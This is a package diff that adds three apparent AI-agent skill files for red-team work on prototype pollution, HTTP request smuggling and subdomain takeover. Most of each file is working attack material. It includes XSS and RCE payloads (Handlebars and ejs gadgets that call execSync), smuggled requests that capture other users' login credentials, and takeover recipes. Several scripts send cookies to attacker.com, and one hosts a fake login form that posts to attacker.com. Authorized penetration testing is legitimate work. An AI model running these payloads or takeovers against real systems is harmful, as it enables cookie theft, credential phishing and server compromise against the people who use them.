rtexit-method 0.1.8 → 0.1.10

package/packaged-assets/.agents/skills/rt-prototype-pollution/SKILL.md

@@ -0,0 +1,154 @@
+---
+name: rt-prototype-pollution
+description: "Prototype pollution attack skill for authorized engagements. Client-side prototype pollution to DOM XSS and cookie theft, server-side prototype pollution in Node.js to RCE, gadget chains for PP escalation, AST injection via prototype pollution, property injection in lodash/merge functions, and automated detection with PPScan. Use when testing JavaScript applications (both browser-side and Node.js server-side)."
+---
+
+# rt-prototype-pollution — Prototype Pollution
+
+## Overview
+
+JavaScript's prototype chain allows every object to inherit properties from its prototype. Prototype pollution injects properties into `Object.prototype` — affecting ALL objects in the application. Client-side: leads to DOM XSS. Server-side: leads to RCE, authentication bypass, and privilege escalation.
+
+---
+
+## Phase 1 — Detection
+
+```javascript
+// Client-side detection in browser console
+// Inject test property into Object.prototype
+?__proto__[testprop]=testvalue
+// Or in JSON body: {"__proto__": {"testprop": "testvalue"}}
+
+// Check if it worked
+window.testprop  // Should be "testvalue" if polluted
+({}).testprop    // Any empty object should have it
+
+// Server-side detection
+// Send request with __proto__ in JSON
+fetch('/api/user/update', {
+    method: 'POST',
+    body: JSON.stringify({"__proto__": {"polluted": true}})
+})
+// If server responds differently → server-side PP
+
+// Automated: PPScan
+npm install -g ppscan
+ppscan --url https://target.com
+```
+
+---
+
+## Phase 2 — Client-Side PP to DOM XSS
+
+```bash
+# Inject via URL query parameter
+https://target.com/?__proto__[innerHTML]=<img src=x onerror=alert(1)>
+https://target.com/?__proto__[src]=//attacker.com/evil.js
+
+# Inject via JSON body parameter
+{"username": "test", "__proto__": {"isAdmin": true}}
+{"name": "x", "constructor": {"prototype": {"isAdmin": true}}}
+{"name": "x", "__proto__.__proto__": {"isAdmin": true}}
+
+# Common gadgets (properties that cause XSS when polluted)
+__proto__[innerHTML]       → sets innerHTML of elements
+__proto__[src]             → sets src of script/img elements
+__proto__[href]            → sets href causing XSS
+__proto__[transport_url]   → jQuery JSONP
+__proto__[sequence]        → DOMPurify bypass
+__proto__[NODE_NAME]       → specific framework gadgets
+
+# PayloadsAllTheThings PP gadgets
+# https://github.com/HoLyVieR/prototype-pollution-nsec18
+
+# Exploit: steal cookies via polluted property
+https://target.com/?__proto__[innerHTML]=<script>fetch('https://attacker.com?c='+document.cookie)</script>
+```
+
+---
+
+## Phase 3 — Server-Side PP to RCE
+
+```javascript
+// Node.js server-side prototype pollution → RCE
+
+// Lodash merge (CVE-2019-10744)
+const _ = require('lodash');
+_.merge({}, JSON.parse('{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}'));
+// Pollutes process.mainModule.require or shell property
+
+// express-fileupload PP (CVE-2020-7699)
+// POST with file upload + __proto__ in field name → pollutes globally
+
+// Handlebars template injection via PP (CVE-2019-19919)
+// Pollute __proto__.pendingContent → template execution
+const payload = '{"__proto__": {"pendingContent": "{{#with \"s\" as |string|}}{{#with \"e\"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub \"constructor\")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push \"return require(\'child_process\').execSync(\'id\').toString()\"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}"}}';
+
+// Detect via spawn/exec pollution
+// If shell property polluted → child_process.exec uses it
+const {exec} = require('child_process');
+exec('id');  // If __proto__.shell='node' → executes node instead
+```
+
+---
+
+## Phase 4 — Escalation via Gadgets
+
+```javascript
+// Property injection gadgets for various frameworks
+
+// Express.js
+__proto__[admin] = true          // Bypass auth checks: if(req.user.admin)
+__proto__[authorized] = true
+__proto__[role] = "admin"
+
+// ejs template RCE gadget
+__proto__[outputFunctionName] = "x; process.mainModule.require('child_process').execSync('id'); //"
+
+// Pug template
+__proto__[compileDebug] = 1
+__proto__[self] = 1
+
+// Finding gadgets manually
+// Search codebase for dangerous property accesses that could be polluted:
+grep -r "opts\.\|options\.\|config\." src/ | grep -v "==" | grep -v "!=="
+# Properties read from objects without hasOwnProperty check = potential gadgets
+```
+
+---
+
+## Phase 5 — Fix Bypass Techniques
+
+```javascript
+// App uses Object.create(null) to avoid PP? Try:
+{"constructor": {"prototype": {"polluted": true}}}
+
+// App filters __proto__? Use:
+{"constructor": {"prototype": {"polluted": true}}}
+// or URL encoded: %5F%5Fproto%5F%5F
+
+// Deep merge bypass
+{"a": {"__proto__": {"polluted": true}}}
+// Some merge functions recurse → pollutes at depth
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** DOM XSS via URL-based PP · isAdmin bypass via polluted property
+
+**INTERMEDIATE:** PP gadget research in target's framework · Server-side PP detection
+
+**ADVANCED:** ejs/Pug RCE via PP gadgets · Lodash merge exploitation · PP chain to full server compromise
+
+**EXPERT:** Custom gadget discovery · PP + deserialization chains · 0-day PP in popular frameworks
+
+---
+
+## References
+
+- PortSwigger PP: https://portswigger.net/web-security/prototype-pollution
+- PP gadgets research: https://github.com/BlackFan/client-side-prototype-pollution
+- Server-side PP: https://portswigger.net/research/server-side-prototype-pollution
+- MITRE T1059.007: https://attack.mitre.org/techniques/T1059/007/

package/packaged-assets/.agents/skills/rt-request-smuggling/SKILL.md

@@ -0,0 +1,187 @@
+---
+name: rt-request-smuggling
+description: "HTTP Request Smuggling attack skill for authorized engagements. CL.TE and TE.CL desync attacks, HTTP/2 downgrade smuggling (H2.CL, H2.TE), request queue poisoning for account takeover, smuggling to bypass front-end security controls, capturing other users' requests, response queue poisoning, and Burp Suite smuggling detection. Use when testing applications behind reverse proxies, load balancers, or CDNs."
+---
+
+# rt-request-smuggling — HTTP Request Smuggling
+
+## Overview
+
+HTTP Request Smuggling exploits disagreements between front-end (proxy/CDN) and back-end servers about where one HTTP request ends and the next begins. The front-end sees one request; the back-end sees two — the second being a "smuggled" request that can poison the queue, hijack other users' requests, or bypass security controls.
+
+**Conditions:** Front-end + back-end server, both parsing HTTP differently (Content-Length vs Transfer-Encoding).
+
+---
+
+## Phase 1 — Detection
+
+```http
+# CL.TE detection — front-end uses Content-Length, back-end uses TE
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 6
+Transfer-Encoding: chunked
+
+0
+
+X
+```
+
+```bash
+# Burp Suite — HTTP Request Smuggler extension (BApp Store)
+# Scanner → Scan → HTTP Request Smuggling
+
+# Manual timing-based detection
+# If response takes ~10s with no timeout set → backend stalled on incomplete chunk → CL.TE vulnerable
+
+# smuggler.py — automated detection
+git clone https://github.com/defparam/smuggler
+python3 smuggler.py -u https://target.com/
+```
+
+---
+
+## Phase 2 — CL.TE (Front-end: Content-Length, Back-end: Transfer-Encoding)
+
+```http
+# Smuggled prefix poisoning
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 13
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+```
+
+```http
+# Capture next user's request (account takeover)
+POST / HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 130
+Transfer-Encoding: chunked
+
+0
+
+POST /login HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 100
+
+username=captured_
+# Next user's request body appends here → steals their credentials
+```
+
+---
+
+## Phase 3 — TE.CL (Front-end: Transfer-Encoding, Back-end: Content-Length)
+
+```http
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+5e
+POST /admin HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+admin=true&x=
+0
+```
+
+---
+
+## Phase 4 — H2.CL / H2.TE (HTTP/2 Downgrade Smuggling)
+
+```http
+# HTTP/2 requests downgraded to HTTP/1.1 at the proxy
+# Inject Content-Length or Transfer-Encoding in HTTP/2 headers
+
+# H2.CL — inject Content-Length in HTTP/2
+:method POST
+:path /
+:authority target.com
+content-type application/x-www-form-urlencoded
+content-length 0
+
+# H2.TE — inject Transfer-Encoding in HTTP/2 pseudo-header
+:method POST
+transfer-encoding chunked
+# Body follows with chunked encoding
+```
+
+```bash
+# Burp Suite — HTTP/2 smuggling
+# Repeater → toggle HTTP/2 → inject headers manually
+# Inspector pane → add custom headers without content-length auto-calculation
+```
+
+---
+
+## Phase 5 — Security Control Bypass
+
+```http
+# Bypass front-end IP restriction
+# Front-end blocks /admin from external IPs
+# Smuggle request to appear as internal
+
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 116
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: target.com
+X-Forwarded-For: 127.0.0.1
+X-Original-URL: /admin
+Content-Length: 10
+
+x=1
+```
+
+---
+
+## Phase 6 — Response Queue Poisoning
+
+```http
+# Poison response queue → steal other users' responses
+# Works when backend uses persistent connections
+
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 43
+Transfer-Encoding: chunked
+
+0
+
+GET /admin/delete?user=victim HTTP/1.1
+X: X
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Burp HTTP Request Smuggler extension for automated detection
+
+**INTERMEDIATE:** Manual CL.TE/TE.CL with Burp Repeater · Security control bypass
+
+**ADVANCED:** Request capture for account takeover · H2.CL/H2.TE HTTP/2 smuggling
+
+**EXPERT:** Response queue poisoning · Custom timing-based detection · CDN-specific variants
+
+---
+
+## References
+
+- PortSwigger Research: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
+- PortSwigger Lab: https://portswigger.net/web-security/request-smuggling
+- smuggler.py: https://github.com/defparam/smuggler
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-subdomain-takeover/SKILL.md

@@ -0,0 +1,307 @@
+---
+name: rt-subdomain-takeover
+description: "Subdomain takeover skill for authorized engagements. Identifying dangling CNAME records pointing to unclaimed services, takeover on GitHub Pages, Heroku, AWS S3, Azure, Netlify, Fastly, Shopify, and 50+ other platforms, DNS hijacking via expired domains, NS takeover for full zone control, automated scanning with Subzy and Nuclei, and impact demonstration via cookie theft and phishing. Use after subdomain enumeration to identify high-impact unclaimed subdomains."
+---
+
+# rt-subdomain-takeover — Subdomain Takeover
+
+## Overview
+
+Subdomain takeover occurs when a subdomain has a CNAME record pointing to an external service that no longer exists or is unclaimed. An attacker claims that service, hosts malicious content under the company's subdomain, and can steal cookies, run phishing, bypass CSP, or conduct further attacks under a trusted domain.
+
+**Impact:**
+- Serve malicious content under `trusted-corp.com` subdomain
+- Steal cookies scoped to `.corp.com` (if HttpOnly not set)
+- Bypass CSP (content served from trusted origin)
+- Send phishing emails from `mail.corp.com`
+- Full zone control if NS record is dangling
+
+---
+
+## Phase 1 — Discovery
+
+```bash
+# Step 1: Enumerate all subdomains (feed from rt-subdomain-enum output)
+subfinder -d corp.com -all -silent | tee subs.txt
+amass enum -passive -d corp.com -o subs-amass.txt
+cat subs*.txt | sort -u > all-subs.txt
+
+# Step 2: Check CNAME records for each subdomain
+while read sub; do
+    cname=$(dig CNAME +short $sub)
+    if [ -n "$cname" ]; then
+        echo "$sub → $cname"
+    fi
+done < all-subs.txt | tee cname-map.txt
+
+# Step 3: Check if CNAME target exists / is claimed
+while IFS=' → ' read sub cname; do
+    # Check if CNAME target resolves
+    if ! dig +short $cname | grep -q '[0-9]'; then
+        echo "[DANGLING] $sub → $cname"
+    fi
+done < cname-map.txt
+
+# Step 4: Check for NXDOMAIN (subdomain exists in DNS but CNAME target gone)
+while read sub; do
+    result=$(dig +short $sub)
+    if [ -z "$result" ]; then
+        # Check if there's a CNAME that leads nowhere
+        cname=$(dig CNAME +short $sub 2>/dev/null)
+        [ -n "$cname" ] && echo "[CANDIDATE] $sub → $cname"
+    fi
+done < all-subs.txt
+```
+
+---
+
+## Phase 2 — Automated Scanning
+
+```bash
+# Subzy — dedicated subdomain takeover scanner
+go install github.com/LukaSikic/subzy@latest
+subzy run --targets all-subs.txt
+# Checks against 50+ fingerprints for vulnerable services
+
+# Nuclei — subdomain takeover templates
+nuclei -l all-subs.txt -t ~/nuclei-templates/http/takeovers/
+# Covers: GitHub Pages, Heroku, AWS S3, Azure, Netlify, Fastly, etc.
+
+# subjack
+go install github.com/haccer/subjack@latest
+subjack -w all-subs.txt -t 100 -timeout 30 -o results.txt -ssl
+
+# Can-I-Take-Over-XYZ (reference list)
+# https://github.com/EdOverflow/can-i-take-over-xyz
+# Lists fingerprints and claimable status per service
+
+# Manual check: visit subdomains with Burp + look for:
+# "NoSuchBucket" = S3 takeover
+# "There is no app here" = Heroku takeover
+# "404 Not Found" on GitHub Pages
+# "Fastly error: 404 Unknown" = Fastly takeover
+# "azure websites" errors = Azure App Service
+```
+
+---
+
+## Phase 3 — Service-Specific Takeovers
+
+### GitHub Pages
+
+```bash
+# Fingerprint: "There isn't a GitHub Pages site here"
+# Check: dig CNAME sub.corp.com → corp-org.github.io
+
+# Takeover:
+# 1. Create GitHub account / org matching the CNAME
+# 2. Create repo: corp-org/corp-org.github.io
+# 3. Enable GitHub Pages
+# 4. Add CNAME file: echo "sub.corp.com" > CNAME
+# 5. sub.corp.com now serves your content
+
+# Or if CNAME points to username.github.io:
+# 1. Register GitHub username: corp-username
+# 2. Create repo: corp-username.github.io
+# 3. sub.corp.com → your repo
+```
+
+### AWS S3
+
+```bash
+# Fingerprint: "NoSuchBucket" or "The specified bucket does not exist"
+# Check: dig CNAME sub.corp.com → sub.corp.com.s3.amazonaws.com
+#        or: sub.corp.com.s3-website-us-east-1.amazonaws.com
+
+# Takeover:
+aws s3 mb s3://sub.corp.com --region us-east-1
+# Bucket name must EXACTLY match the subdomain
+aws s3 website s3://sub.corp.com/ \
+  --index-document index.html \
+  --error-document error.html
+
+# Upload malicious content
+echo '<script>document.location="https://attacker.com?c="+document.cookie</script>' \
+  > index.html
+aws s3 cp index.html s3://sub.corp.com/
+
+# sub.corp.com now serves your page under corp.com's domain
+```
+
+### Heroku
+
+```bash
+# Fingerprint: "No such app" or "herokuapps.com" CNAME
+# CNAME: sub.corp.com → random-name-12345.herokudns.com
+
+# Takeover:
+heroku create random-name-12345
+heroku domains:add sub.corp.com --app random-name-12345
+# Deploy app to random-name-12345
+# sub.corp.com → your Heroku app
+```
+
+### Azure App Service
+
+```bash
+# Fingerprint: "Microsoft Azure App Service" 404
+# CNAME: sub.corp.com → corp-app.azurewebsites.net
+
+# Takeover:
+az webapp create --name corp-app \
+  --resource-group myRG \
+  --plan myPlan
+az webapp config hostname add \
+  --webapp-name corp-app \
+  --resource-group myRG \
+  --hostname sub.corp.com
+```
+
+### Netlify
+
+```bash
+# Fingerprint: "Not found - Request ID"
+# CNAME: sub.corp.com → corp.netlify.app
+
+# Takeover:
+# 1. Create Netlify site → site settings → domain management
+# 2. Add custom domain: sub.corp.com
+# 3. Deploy malicious site
+netlify deploy --prod
+```
+
+### Fastly
+
+```bash
+# Fingerprint: "Fastly error: 404 Unfound" or "Unknown domain"
+# CNAME: sub.corp.com → something.fastly.net
+
+# Takeover:
+# Create Fastly service → add domain: sub.corp.com
+# sub.corp.com now served by your Fastly service
+```
+
+---
+
+## Phase 4 — NS Record Takeover (Critical)
+
+```bash
+# If subdomain.corp.com has NS records pointing to expired/unclaimed nameservers
+# → attacker claims the nameservers → full DNS control for that subdomain
+
+# Check NS records
+dig NS sub.corp.com
+# ns1.expired-dns-provider.com
+# ns2.expired-dns-provider.com
+
+# Check if provider is still active
+whois expired-dns-provider.com | grep -i "expir"
+# If expired/available → register it → control all DNS for sub.corp.com
+
+# Once you control NS:
+# → Create A records → point to attacker server
+# → Create MX records → intercept email to @sub.corp.com
+# → Create any record → full subdomain zone control
+```
+
+---
+
+## Phase 5 — Impact Demonstration
+
+```bash
+# Cookie theft (demonstrate scope)
+# If corp.com sets cookies with Domain=.corp.com:
+# sub.corp.com can read those cookies!
+
+# Host on claimed subdomain:
+cat > index.html << 'EOF'
+<html>
+<script>
+// Steal .corp.com scoped cookies
+var stolen = document.cookie;
+fetch('https://attacker.com/log?cookies=' + encodeURIComponent(stolen));
+
+// Demonstrate phishing capability
+document.write('<h1>Corp.com Login Portal</h1>');
+document.write('<form action="https://attacker.com/collect" method="POST">');
+document.write('<input name="user" placeholder="Username"><br>');
+document.write('<input name="pass" type="password" placeholder="Password"><br>');
+document.write('<button>Login</button></form>');
+</script>
+</html>
+EOF
+
+# CSP bypass: if corp.com has CSP: script-src *.corp.com
+# Loading scripts from sub.corp.com bypasses CSP completely
+# <script src="https://sub.corp.com/evil.js"></script>  ← allowed by CSP!
+```
+
+---
+
+## Phase 6 — Evidence Documentation
+
+```bash
+# Screenshot the takeover proof
+# Show: sub.corp.com serving your content
+
+# curl to confirm
+curl -I https://sub.corp.com
+# Server: your-server
+# Content shows attacker-controlled content
+
+# Document CNAME chain
+dig CNAME +trace sub.corp.com
+
+# Finding template:
+# Title: Subdomain Takeover — sub.corp.com
+# Severity: HIGH (cookie theft possible) / MEDIUM (content injection)
+# CVSS: 8.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) if cookie theft
+# Evidence: screenshot + curl output + CNAME chain
+# Impact: phishing under trusted domain, cookie theft, CSP bypass
+# Remediation: remove dangling DNS record OR re-claim the service
+```
+
+---
+
+## Most Vulnerable Services (Quick Reference)
+
+```
+Service               Fingerprint                              Claimable
+─────────────────────────────────────────────────────────────────────────
+GitHub Pages          "There isn't a GitHub Pages site here"  ✅ Yes
+AWS S3                "NoSuchBucket"                          ✅ Yes
+Heroku                "No such app"                           ✅ Yes
+Azure App Service     Azure 404 page                          ✅ Yes
+Netlify               "Not found - Request ID"                ✅ Yes
+Fastly                "Fastly error: 404 Unfound"             ✅ Yes
+Shopify               "Sorry, this shop is currently..."      ✅ Yes
+Tumblr                "There's nothing here"                  ✅ Yes
+WordPress.com         "Do you want to register..."            ✅ Yes
+Ghost                 "The thing you were looking for..."     ✅ Yes
+Surge.sh              "project not found"                     ✅ Yes
+Bitbucket             "Repository not found"                  ✅ Yes
+Zendesk               "Help Center Closed"                    ✅ Yes
+Freshdesk             "We could not find what..."             ⚠️  Limited
+Desk.com (Salesforce) "Please try again"                      ✅ Yes
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** subfinder + subzy automated scan → identify candidates → manual verification
+
+**INTERMEDIATE:** GitHub Pages / S3 takeover PoC → cookie theft demonstration
+
+**ADVANCED:** NS takeover → full zone control → MX takeover for email interception
+
+**EXPERT:** Chained attack: takeover → CSP bypass → XSS on main domain → account takeover
+
+---
+
+## References
+
+- Can-I-Take-Over-XYZ: https://github.com/EdOverflow/can-i-take-over-xyz
+- Subzy: https://github.com/LukaSikic/subzy
+- Nuclei takeover templates: https://github.com/projectdiscovery/nuclei-templates
+- MITRE T1584.001: https://attack.mitre.org/techniques/T1584/001/